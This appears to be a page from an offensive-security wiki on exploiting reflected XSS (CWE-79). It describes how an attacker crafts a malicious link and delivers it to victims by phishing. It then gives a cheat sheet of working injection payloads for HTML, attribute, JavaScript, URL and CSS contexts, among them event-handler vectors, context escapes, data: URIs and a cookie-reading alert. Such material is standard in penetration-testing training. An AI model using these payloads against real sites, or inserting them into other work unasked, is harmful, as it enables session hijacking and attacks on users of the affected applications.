Skip to main content

Reflected XSS

CWECWE-79
Toolsdalfox
Difficulty🟡 intermediate

Exploit Reflected XSS​

Reflected XSS occurs when user input is immediately returned in the HTTP response without proper encoding. The attack requires the victim to click a malicious link or submit a crafted form.

Technical flow:

  1. You craft a URL with a malicious payload in a parameter
  2. Victim clicks the link (via phishing, social engineering, or watering hole)
  3. Server reflects the payload in the response without sanitization
  4. Victim's browser executes the payload in the application's context

Common Injection Contexts​

HTML Context (between tags):

  • Input appears directly in HTML body: <p>Search results for: USER_INPUT</p>
  • Attack: <script>alert(1)</script>

HTML Attribute Context:

  • Input appears inside an attribute value: <input value="USER_INPUT">
  • Attack: " onmouseover="alert(1)" x="

JavaScript Context:

  • Input appears inside a <script> block: var search = "USER_INPUT";
  • Attack: ";alert(1)//

URL Context:

  • Input appears in href or src attributes: <a href="USER_INPUT">
  • Attack: javascript:alert(1)

CSS Context:

  • Input appears in style attributes or <style> blocks: <div style="background: USER_INPUT">
  • Attack: url('javascript:alert(1)')

Basic Payloads (No Filtering)​

HTML Body:

<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">

Attribute Escape:

" onmouseover="alert(1)
' onfocus='alert(1)' autofocus='
" autofocus onfocus="alert(1)
" onclick="alert(1)
"><script>alert(1)</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>

JavaScript Context Escape:

'-alert(1)-'
';alert(1)//
";alert(1)//
\';alert(1)//
</script><script>alert(1)</script>

URL Parameter Injection:

javascript:alert(1)
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==